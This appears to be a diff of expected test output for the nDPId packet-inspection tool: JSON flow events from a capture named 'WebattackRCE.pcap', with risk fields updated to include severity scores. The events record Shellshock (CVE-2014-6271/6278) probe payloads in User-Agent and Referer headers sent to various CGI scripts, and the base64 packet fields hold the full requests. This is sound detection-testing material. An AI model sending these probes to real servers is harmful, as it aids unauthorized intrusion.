-00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/defaultwebpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/defaultwebpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":1,"flow_last_seen":1576420277402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"ts_msec":1576420277402,"pkt":"AAAAAAAAAAAAAAAACABFAAENn\/9AAEAGm+l\/AAABfwAAAcUiH5Cfgqc8sQq4SIAYAED\/AQAAAQEICp1m\/cKdZv3CR0VUIC9kb3dubG9hZC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/download.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/download.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":1,"flow_last_seen":1576420277403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":288,"pkt_l4_len":254,"ts_msec":1576420277403,"pkt":"AAAAAAAAAAAAAAAACABFAAESp5VAAEAGlE5\/AAABfwAAAcUkH5At0J9VXKwRhYAYAED\/BgAAAQEICp1m\/cOdZv3DR0VUIC9lbnRyb3B5c2VhcmNoLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"}
-00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/entropysearch.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/entropysearch.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":1,"flow_last_seen":1576420277405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"ts_msec":1576420277405,"pkt":"AAAAAAAAAAAAAAAACABFAAEI2lVAAEAGYZh\/AAABfwAAAcUmH5ARUOKViVHVaYAYAED+\/AAAAQEICp1m\/cSdZv3ER0VUIC9lbnYuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/env.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/env.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":1,"flow_last_seen":1576420277406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":286,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":286,"pkt_l4_len":252,"ts_msec":1576420277406,"pkt":"AAAAAAAAAAAAAAAACABFAAEQ2p9AAEAGYUZ\/AAABfwAAAcUoH5D43eJbIwWC0IAYAED\/BAAAAQEICp1m\/cadZv3GR0VUIC9lbnZpcm9ubWVudC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="}
-00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/environment.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/environment.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":1,"flow_last_seen":1576420277407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"ts_msec":1576420277407,"pkt":"AAAAAAAAAAAAAAAACABFAAENbStAAEAGzr1\/AAABfwAAAcUqH5C5flXvg270eYAYAED\/AQAAAQEICp1m\/cedZv3HR0VUIC9lem1sbS1icm93c2UgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="}
-00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ezmlm-browse","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ezmlm-browse","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":1,"flow_last_seen":1576420277409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"ts_msec":1576420277409,"pkt":"AAAAAAAAAAAAAAAACABFAAENkcFAAEAGqid\/AAABfwAAAcUsH5BKNKl4Ee+JJYAYAED\/AQAAAQEICp1m\/cmdZv3JR0VUIC9mb3JtbWFpbC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="}
-00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/formmail.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/formmail.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1576420277410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"ts_msec":1576420277410,"pkt":"AAAAAAAAAAAAAAAACABFAAEToPJAAEAGmvB\/AAABfwAAAcUuH5CLPJg5VfIqUIAYAED\/BwAAAQEICp1m\/cqdZv3KR0VUIC9Gb3JtTWFpbC1jbG9uZS5jZ2kgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/FormMail-clone.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/FormMail-clone.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
